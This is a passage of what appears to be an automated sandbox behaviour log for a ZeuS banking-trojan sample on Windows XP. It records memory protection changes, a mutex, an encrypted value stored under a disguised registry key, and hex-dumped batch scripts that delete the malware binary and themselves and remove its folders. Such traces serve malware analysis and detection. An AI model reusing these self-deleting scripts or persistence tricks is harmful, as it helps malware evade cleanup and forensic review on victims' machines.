Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004586400
Mutant created Name: \BaseNamedObjects\Global\{50BFCA5C-F2C1-7FC9-185B-81F8EE8A3A3D} success or wait 2004589344
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: Okmaykid success or wait 2004589545
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: Okmaykid success or wait 2004589732
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: Okmaykid Type: Binary Data: 96 8D 31 C9 C5 75 08 F8 84 53 9B D1 F4 B9 61 28 10 B5 F1 08 71 3F 43 D6 C5 E1 62 1A C6 5B 19 DC CC D6 C6 9D C6 B3 0A 3C 08 2E 18 33 00 4D BE 0B 36 BD B7 A3 BD 92 EA 03 1F E4 1B C7 16 2B 45 CA B5 08 9E BA 6B 0D 91 DA 05 B1 6F 8F BD 44 64 5A BF 72 4F 66 A5 9E C5 70 A4 30 85 A9 DA E1 B0 C2 84 42 08 3E FA A7 EC BB C8 A3 E1 74 73 02 2C 20 4D 52 81 9C success or wait 2004590457
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: DisableUNCCheck object name not found 2004591571
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: EnableExtensions success or wait 2004591770
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: DelayedExpansion object name not found 2004591957
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: DefaultColor success or wait 2004592143
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: CompletionChar success or wait 2004592330
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: PathCompletionChar success or wait 2004592516
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: AutoRun success or wait 2004592703
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: DisableUNCCheck object name not found 2004592921
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: EnableExtensions success or wait 2004593111
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: DelayedExpansion object name not found 2004593299
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: DefaultColor success or wait 2004593486
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: CompletionChar success or wait 2004593673
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: PathCompletionChar object name not found 2004593859
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: AutoRun object name not found 2004594045
Memory allocated PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C60000 Length: 13FE10 Allocation Type: null Protection: page read and write success or wait 2004594983
Section loaded Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat Access: query and read Type: commit Baseaddress: C70000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2004608614
File read Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat Offset: none Length: 8192 Value: 40 65 63 68 6F 20 6F 66 66 0D 0A 3A 64 0D 0A 64 65 6C 20 22 43 3A 5C 5A 65 75 53 5F 62 69 6E 61 72 79 5F 66 62 36 35 31 30 34 63 63 64 32 63 61 36 36 34 34 39 36 32 33 34 64 33 66 32 63 32 61 33 37 31 2E 65 78 65 22 0D 0A 69 66 20 65 78 69 73 74 20 22 43 3A 5C 5A 65 75 53 5F 62 69 6E 61 72 79 5F 66 success or wait 2004611505
File read Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat Offset: none Length: 8192 Value: 3A 64 0D 0A 64 65 6C 20 22 43 3A 5C 5A 65 75 53 5F 62 69 6E 61 72 79 5F 66 62 36 35 31 30 34 63 63 64 32 63 61 36 36 34 34 39 36 32 33 34 64 33 66 32 63 32 61 33 37 31 2E 65 78 65 22 0D 0A 69 66 20 65 78 69 73 74 20 22 43 3A 5C 5A 65 75 53 5F 62 69 6E 61 72 79 5F 66 62 36 35 31 30 34 63 63 64 32 63 success or wait 2004617649
File read Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat Offset: none Length: 8192 Value: 64 65 6C 20 22 43 3A 5C 5A 65 75 53 5F 62 69 6E 61 72 79 5F 66 62 36 35 31 30 34 63 63 64 32 63 61 36 36 34 34 39 36 32 33 34 64 33 66 32 63 32 61 33 37 31 2E 65 78 65 22 0D 0A 69 66 20 65 78 69 73 74 20 22 43 3A 5C 5A 65 75 53 5F 62 69 6E 61 72 79 5F 66 62 36 35 31 30 34 63 63 64 32 63 61 36 36 34 success or wait 2004622529
File opened Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Access: read attributes and delete Options: non directory file and open for backup ident and open reparse point success or wait 2004628034
File read Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat Offset: none Length: 8192 Value: 69 66 20 65 78 69 73 74 20 22 43 3A 5C 5A 65 75 53 5F 62 69 6E 61 72 79 5F 66 62 36 35 31 30 34 63 63 64 32 63 61 36 36 34 34 39 36 32 33 34 64 33 66 32 63 32 61 33 37 31 2E 65 78 65 22 20 67 6F 74 6F 20 64 0D 0A 64 65 6C 20 2F 46 20 22 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 41 44 4D 49 4E 49 7E 31 5C success or wait 2004631361
File read Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat Offset: none Length: 8192 Value: 64 65 6C 20 2F 46 20 22 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 41 44 4D 49 4E 49 7E 31 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 74 6D 70 65 64 65 64 39 31 31 65 2E 62 61 74 22 0D 0A 22 20 67 6F 74 6F 20 64 0D 0A 00 65 6C 20 2F 46 20 22 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 41 44 4D 49 4E 49 7E 31 5C success or wait 2004639100
File opened Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat Access: read attributes and delete Options: non directory file and open for backup ident and open reparse point success or wait 2004644606
File opened Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false object name not found 2004646213
+ Sections
+ General
Start time: 06:07:15
Start date: 01/12/2011
Path: C:\WINDOWS\system32\cmd.exe
Commandline: C:\WINDOWS\system32\cmd.exe /c C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat
Imagebase: 0x4ad00000
File size: 389120 bytes
MD5 hash: 6D778E0F95447E6546553EEEA709D03C
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\Foluv read attributes and delete and synchronize directory file and synchronous io non alert and open for backup ident and open reparse point object name not found 1 4AD0D378
C:\Documents and Settings\Administrator\Application Data\Qiokze read attributes and delete and synchronize directory file and synchronous io non alert and open for backup ident and open reparse point object name not found 1 4AD0D378
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat read attributes and delete non directory file and open for backup ident and open reparse point success or wait 1 4AD17D07
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 1 4AD02F12
+ File read
File Path Offset Length Value Completion Count Source Address
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat none 8192 40 65 63 68 6F 20 6F 66 66 0D 0A 3A 64 0D 0A 72 64 20 2F 53 20 2F 51 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 41 70 70 6C 69 63 61 74 69 6F 6E 20 44 61 74 61 5C 46 6F 6C 75 76 22 0D 0A 72 64 20 2F 53 20 2F 51 20 22 success or wait 1 4AD069F8
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat none 8192 3A 64 0D 0A 72 64 20 2F 53 20 2F 51 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 41 70 70 6C 69 63 61 74 69 6F 6E 20 44 61 74 61 5C 46 6F 6C 75 76 22 0D 0A 72 64 20 2F 53 20 2F 51 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 success or wait 1 4AD069F8
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat none 8192 72 64 20 2F 53 20 2F 51 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 41 70 70 6C 69 63 61 74 69 6F 6E 20 44 61 74 61 5C 46 6F 6C 75 76 22 0D 0A 72 64 20 2F 53 20 2F 51 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E success or wait 1 4AD069F8
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat none 8192 72 64 20 2F 53 20 2F 51 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 41 70 70 6C 69 63 61 74 69 6F 6E 20 44 61 74 61 5C 51 69 6F 6B 7A 65 22 0D 0A 69 66 20 65 78 69 73 74 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 success or wait 1 4AD069F8
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat none 8192 69 66 20 65 78 69 73 74 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 41 70 70 6C 69 63 61 74 69 6F 6E 20 44 61 74 61 5C 46 6F 6C 75 76 22 20 67 6F 74 6F 20 64 0D 0A 69 66 20 65 78 69 73 74 20 22 43 3A 5C 44 6F 63 75 6D success or wait 1 4AD069F8
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat none 8192 69 66 20 65 78 69 73 74 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 41 70 70 6C 69 63 61 74 69 6F 6E 20 44 61 74 61 5C 51 69 6F 6B 7A 65 22 20 67 6F 74 6F 20 64 0D 0A 64 65 6C 20 2F 46 20 22 43 3A 5C 44 4F 43 55 4D 45 success or wait 1 4AD069F8
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat none 8192 64 65 6C 20 2F 46 20 22 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 41 44 4D 49 4E 49 7E 31 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 74 6D 70 34 64 39 34 65 34 64 37 2E 62 61 74 22 0D 0A 20 44 61 74 61 5C 51 69 6F 6B 7A 65 22 20 67 6F 74 6F 20 64 0D 0A 00 65 6C 20 2F 46 20 22 43 3A 5C 44 4F 43 55 4D 45 success or wait 1 4AD069F8
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
none query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 270000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 290000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 2E0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 330000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown 330000 24576 own pid readonly object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown 330000 24576 own pid readonly object name not found 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\ShimEng.dll write and read and execute unknown 77F10000 299008 own pid read write object name not found 1
C:\WINDOWS\system32\shimeng.dll query and write and read and execute image 5CB70000 155648 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 340000 1208320 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 480000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 480000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll query and write and read and execute image 6F880000 1875968 own pid read write success or wait 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\WINMM.dll write and read and execute unknown 77FE0000 69632 own pid read write object name not found 1
C:\WINDOWS\system32\winmm.dll query and write and read and execute image 76B40000 184320 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
\KnownDlls\MSACM32.dll write and read and execute unknown 77120000 569344 own pid read write object name not found 1
C:\WINDOWS\system32\msacm32.dll query and write and read and execute image 77BE0000 86016 own pid read write success or wait 1
\KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
\KnownDlls\USERENV.dll write and read and execute unknown 769C0000 737280 own pid read write success or wait 1
\KnownDlls\UxTheme.dll write and read and execute unknown 769C0000 737280 own pid read write object name not found 1
C:\WINDOWS\system32\uxtheme.dll query and write and read and execute image 5AD70000 229376 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 490000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 410000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 410000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
C:\WINDOWS\system32\shell32.dll read commit 970000 8462336 own pid readonly success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 970000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 440000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 440000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 440000 4096 own pid readonly success or wait 1
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit 970000 618496 own pid readonly success or wait 1
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat query and read commit 980000 4096 own pid readonly success or wait 1
Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
Registry Activities:
+ Key value queried
Key Path Name Completion Count Source Address
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager DisableUNCCheck object name not found 2 4AD04A2A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager EnableExtensions success or wait 2 4AD04A4F
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager DelayedExpansion object name not found 2 4AD04A88
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager DefaultColor success or wait 2 4AD04AAD
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager CompletionChar success or wait 1 4AD04AE5
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager PathCompletionChar success or wait 1 4AD04B37
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager AutoRun success or wait 1 4AD04BB8
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager CompletionChar success or wait 1 4AD04AE5
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager PathCompletionChar object name not found 1 4AD04B37
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager AutoRun object name not found 1 4AD04BB8
Memory Activities:
+ Memory allocated
PID Filepath Base Length Protection Completion Count Source Address
604 C:\WINDOWS\system32\cmd.exe 970000 13FE10 page read and write success or wait 1 4AD04578
+ Chronological sections
Operation Data Completion Time
Section loaded Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2109430771
Section loaded Path: none Access: query and write and read and execute and extend size Type: reserve Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2109434282
Section loaded Path: \NLS\NlsSectionUnicode Access: read Type: unknown Baseaddress: 270000 Size: 90112 Protection: readonly Mapped to pid: own pid success or wait 2109437687
Section loaded Path: \NLS\NlsSectionLocale Access: read Type: unknown Baseaddress: 290000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2109438695
Section loaded Path: \NLS\NlsSectionSortkey Access: query and read Type: unknown Baseaddress: 2E0000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2109439477
Section loaded Path: \NLS\NlsSectionSortTbls Access: read Type: unknown Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid success or wait 2109440206
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2109441319
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2109441676
Section loaded Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 2109452261
Section loaded Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 2109455518
Section loaded Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 2109456375
Section loaded Path: \KnownDlls\ShimEng.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid object name not found 2109462572
Section loaded Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid success or wait 2109464270
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 340000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2109469026
Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 480000 Size: 1855488 Protection: execute Mapped to pid: own pid success or wait 2109479460
Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 480000 Size: 1855488 Protection: execute Mapped to pid: own pid success or wait 2109481541
Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: query and write and read and execute Type: image Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid success or wait 2109483982
Section loaded Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid success or wait 2109487493
Section loaded Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid success or wait 2109490353
Section loaded Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 2109494211
Section loaded Path: \KnownDlls\WINMM.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid object name not found 2109500221
Section loaded Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid success or wait 2109501636
Section loaded Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid success or wait 2109506705
Section loaded Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 2109514114
Section loaded Path: \KnownDlls\MSACM32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid object name not found 2109520151
Section loaded Path: C:\WINDOWS\system32\msacm32.dll Access: query and write and read and execute Type: image Baseaddress: 77BE0000 Size: 86016 Protection: read write Mapped to pid: own pid success or wait 2109521577
Section loaded Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2109526502
Section loaded Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid success or wait 2109529429
Section loaded Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid success or wait 2109535199
Section loaded Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid success or wait 2109543907
Section loaded Path: \KnownDlls\UxTheme.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid object name not found 2109548865
Section loaded Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid success or wait 2109550313
Section loaded Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 490000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2109558794
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 410000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2109573761
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 410000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2109575947
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 2109578030
Section loaded Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 970000 Size: 8462336 Protection: readonly Mapped to pid: own pid success or wait 2109696896
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 970000 Size: 1056768 Protection: execute Mapped to pid: own pid success or wait 2109737285
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid success or wait 2109739521
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 440000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 2109749051
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 440000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2109755538
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 440000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2109764428
Section loaded Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: unknown Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid success or wait 2109803197
Section loaded Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 970000 Size: 618496 Protection: readonly Mapped to pid: own pid success or wait 2109819502
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: DisableUNCCheck object name not found 2109842723
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: EnableExtensions success or wait 2109843328
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: DelayedExpansion object name not found 2109844093
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: DefaultColor success or wait 2109844602
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: CompletionChar success or wait 2109845109
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: PathCompletionChar success or wait 2109845613
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: AutoRun success or wait 2109846118
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: DisableUNCCheck object name not found 2109846708
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: EnableExtensions success or wait 2109847223
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: DelayedExpansion object name not found 2109847729
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: DefaultColor success or wait 2109848233
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: CompletionChar success or wait 2109848737
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: PathCompletionChar object name not found 2109849242
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: AutoRun object name not found 2109849746
Memory allocated PID: 604 Path: C:\WINDOWS\system32\cmd.exe Base: 970000 Length: 13FE10 Allocation Type: null Protection: page read and write success or wait 2109853363
Section loaded Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat Access: query and read Type: commit Baseaddress: 980000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2109890021
File read Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat Offset: none Length: 8192 Value: 40 65 63 68 6F 20 6F 66 66 0D 0A 3A 64 0D 0A 72 64 20 2F 53 20 2F 51 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 41 70 70 6C 69 63 61 74 69 6F 6E 20 44 61 74 61 5C 46 6F 6C 75 76 22 0D 0A 72 64 20 2F 53 20 2F 51 20 22 success or wait 2109896422
